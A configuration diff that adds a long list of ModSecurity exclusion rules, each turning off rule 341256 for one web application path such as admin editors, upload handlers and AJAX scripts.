+SecRule REQUEST_FILENAME "/imgprod\.php" "phase:2,id:93450,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/phpmyvisites\.php" "phase:2,id:93451,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/editpage\.php" "phase:2,id:93452,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modules/mod_ajax_contact/ajax\.php" "phase:2,id:93453,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/artwork/index/upload_file" "phase:2,id:93454,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/media/upload\.php" "phase:2,id:93455,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/php-stats\.php" "phase:2,id:93456,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/a_config_dt\.php" "phase:2,id:93457,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/aom/item/index\.php" "phase:2,id:93458,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/orders/ordersave\.php" "phase:2,id:93459,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/nucleus/index\.php" "phase:2,id:93460,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/save_post\.php" "phase:2,id:93461,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/provider/offers\.php" "phase:2,id:93462,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/plugins/wp-slimstat/wp-slimstat-js\.php" "phase:2,id:93463,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/editor/sitemanger/index\.php" "phase:2,id:93464,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/addclientvideo\.php" "phase:2,id:93465,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/single_upload\.php" "phase:2,id:93466,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/betrieb\.php" "phase:2,id:93467,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wiki/lib/exe/fetch\.php" "phase:2,id:93468,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/press-this\.php" "phase:2,id:93469,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/pagine\.php" "phase:2,id:93470,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/order-categories\.php" "phase:2,id:93471,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/livehelp/" "phase:2,id:93472,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/livehelp/" "phase:2,id:93473,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/livehelpnew/" "phase:2,id:93474,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/livehelpnew/" "phase:2,id:93475,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/raidlogimport/admin/dkp\.php" "phase:2,id:93476,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/p\.php" "phase:2,id:93477,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admincp/verticalresponse\.php" "phase:2,id:93478,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/editart\.php" "phase:2,id:93479,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/panel/content/itinerary\.php" "phase:2,id:93480,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/adminmailing\.php" "phase:2,id:93481,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/homepageedit\.php" "phase:2,id:93482,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/jobedit\.php" "phase:2,id:93483,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/media-upload\.php" "phase:2,id:93484,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ndxz-studio" "phase:2,id:93485,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ndxzstudio" "phase:2,id:93486,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/json\.php" "phase:2,id:93487,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/_salvaxml\.php" "phase:2,id:93488,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/imp/imple\.php" "phase:2,id:93489,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms/settings\.php" "phase:2,id:93490,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/destination-edit\.php" "phase:2,id:93491,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/posthtml\.php" "phase:2,id:93492,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/template_edit\.asp" "phase:2,id:93493,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/question/edit\.php" "phase:2,id:93494,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/menu\.pl" "phase:2,id:93495,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/add_article\.php" "phase:2,id:93496,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/update\.php" "phase:2,id:93497,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/contactme/xd_receiver\.php" "phase:2,id:93498,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/edit_home\.php" "phase:2,id:93499,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/update-news\.php" "phase:2,id:93500,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mod/quiz/attempt\.php" "phase:2,id:93501,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/linnworks_xml\.php" "phase:2,id:93502,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/order/saveeshop" "phase:2,id:93503,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/comments\.php" "phase:2,id:93504,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/viewraid\.php" "phase:2,id:93505,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/twitter/tweets-grab\.php" "phase:2,id:93506,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/set_label\.php" "phase:2,id:93507,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/index\.php/profile/register/registerprofile" "phase:2,id:93508,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/code_editor\.php" "phase:2,id:93509,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/popeditmarker\.php" "phase:2,id:93510,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/connectors/security/access/policy/template\.php" "phase:2,id:93511,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modiwats\.php" "phase:2,id:93512,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/php-stats\.php" "phase:2,id:93513,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/banner-edit\.php" "phase:2,id:93514,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/content-edit\.php" "phase:2,id:93515,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/paymentrecall\.php" "phase:2,id:93516,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/hostmeinadmin/clientshosting\.php" "phase:2,id:93517,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/processwire/page/edit" "phase:2,id:93518,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/general_settings\.php" "phase:2,id:93519,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/adclick\.php" "phase:2,id:93520,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin_edit_cat\.php" "phase:2,id:93521,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/listings/client\.php" "phase:2,id:93522,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/kontaktformular_web-plaaning\.php" "phase:2,id:93523,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/web-planning\.php" "phase:2,id:93524,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/shop/remote\.php" "phase:2,id:93525,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/beta_add_record\.php" "phase:2,id:93526,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/echeck_receipt\.php" "phase:2,id:93527,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/livehelp/send\.php" "phase:2,id:93528,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tweets-grab-ldn\.php" "phase:2,id:93529,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/receipt\.php" "phase:2,id:93530,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/contenu/modif/" "phase:2,id:93531,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/processproperty\.php" "phase:2,id:93532,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/newsletter/envoi\.php" "phase:2,id:93533,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/extplorer/index\.php" "phase:2,id:93534,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/administrator/functions/update_article\.ph" "phase:2,id:93535,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/functions/client\.php" "phase:2,id:93536,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/op\.php" "phase:2,id:93537,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mod_raxo_allmode/tools/tb\.php" "phase:2,id:93538,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/edit_offer\.php" "phase:2,id:93539,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/foto-graveren\.php" "phase:2,id:93540,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/beta_new_update\.php" "phase:2,id:93541,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/webdav\.php" "phase:2,id:93542,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sassistant/monitoring\.php" "phase:2,id:93543,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/printdeexpediat\.php" "phase:2,id:93544,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/shop/presta_admin/index\.php" "phase:2,id:93545,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/adduserplugin\.php" "phase:2,id:93546,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/edithtmlblob\.php" "phase:2,id:93547,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/video_admin/editvideo/" "phase:2,id:93548,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/administrator/functions/update_article\.php" "phase:2,id:93549,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/catalog/admbre/categories\.php" "phase:2,id:93550,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/send_weeklyadlist\.php" "phase:2,id:93551,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin-edit\.php" "phase:2,id:93552,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/producto\.php" "phase:2,id:93553,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/service/psnabe/clientsservices\.php" "phase:2,id:93554,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/options-permalink\.php" "phase:2,id:93555,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ga\.php" "phase:2,id:93556,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/server_databases\.php" "phase:2,id:93557,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/amember/admin/email\.php" "phase:2,id:93558,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/send_weeklyadlist\.php" "phase:2,id:93559,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/support/agent/index\.php" "phase:2,id:93560,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/web-services/emailme\.php" "phase:2,id:93561,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/we_cmd\.php" "phase:2,id:93562,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/manage_news\.php" "phase:2,id:93563,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/addersivu\.php" "phase:2,id:93564,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/vqgen/" "phase:2,id:93565,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/hallinta/kirjailija\.php" "phase:2,id:93566,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/json-api/cpanel" "phase:2,id:93567,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mod/quiz/attempt\.php" "phase:2,id:93568,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "extplorer/index\.php" "phase:2,id:93569,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-content/themes/oakland/theme/functions/upload\.php" "phase:2,id:93570,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/acp/vbshout\.php" "phase:2,id:93571,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/property\.php" "phase:2,id:93572,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/theme/functions/upload\.php" "phase:2,id:93573,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/showimage\.php\.jpg" "phase:2,id:93574,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/forums/admin/index\.php" "phase:2,id:93575,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/link_list\.js\.php" "phase:2,id:93576,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajax_get_file_listing\.php" "phase:2,id:93577,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/send\.pl" "phase:2,id:93578,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/send_mail_with_attachment\.php" "phase:2,id:93579,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ts_manage\.php" "phase:2,id:93580,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/plugins/eqdkp_uploader/dialog\.php" "phase:2,id:93581,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/plugins/eqdkp_lightbox/dialog\.php" "phase:2,id:93582,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/addeditproperties\.php" "phase:2,id:93583,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/muokkaa_suomi\.php" "phase:2,id:93584,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms/setpage\.php" "phase:2,id:93585,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/quick_updates\.php" "phase:2,id:93586,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/custom404css\.php" "phase:2,id:93587,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/extra_info_pages\.php" "phase:2,id:93588,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/edit-tags\.php" "phase:2,id:93589,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/qrcode/img\.php" "phase:2,id:93590,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/randomimage\.php" "phase:2,id:93591,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/acp/user\.php" "phase:2,id:93592,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/save_page_settings\.php" "phase:2,id:93593,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/changedata\.php" "phase:2,id:93594,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cadmin/index\.php" "phase:2,id:93595,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/magento/index\.php/banner" "phase:2,id:93596,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/factor_edit\.php" "phase:2,id:93597,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/options/editpl\.php" "phase:2,id:93598,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/upload/scripts/ajax\.sfsyncphotos\.php" "phase:2,id:93599,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/adminepharmac\.php" "phase:2,id:93600,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/siteadmin/leafs/addinline" "phase:2,id:93601,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/dmxeditor/dialogs/upload\.php" "phase:2,id:93602,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/plugins/system/phpimageeditor/index\.php" "phase:2,id:93603,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/galeria/thumbs\.php" "phase:2,id:93604,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/prize_posting\.php" "phase:2,id:93605,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/clientservices\.php" "phase:2,id:93606,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajax_save_name\.php" "phase:2,id:93607,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ckeditor/xss" "phase:2,id:93608,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/muuta\.php" "phase:2,id:93609,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin-osb\.php" "phase:2,id:93610,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/envoi-code\.html" "phase:2,id:93611,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tiki-edit_css\.php" "phase:2,id:93612,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/index\.cfm" "phase:2,id:93613,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/e107_plugins/sgallery/showpic\.php" "phase:2,id:93614,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modules/mod_rar_radio/tmpl/player/player\.php" "phase:2,id:93615,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/editpackage\.php" "phase:2,id:93616,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/systeembeheer/mysql" "phase:2,id:93617,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/view_system_style_source\.php" "phase:2,id:93618,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/autorisierung\.php" "phase:2,id:93619,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/updatetemp\.html" "phase:2,id:93620,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin_zoej\.php" "phase:2,id:93621,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/content/item/edit/" "phase:2,id:93622,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/helpdesk/ajax\.cgi" "phase:2,id:93623,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajax_image_thumbnail\.php" "phase:2,id:93624,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajax_delete_file\.php" "phase:2,id:93625,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tools/reacties\.php" "phase:2,id:93626,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/administration/basic_settings\.php" "phase:2,id:93627,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
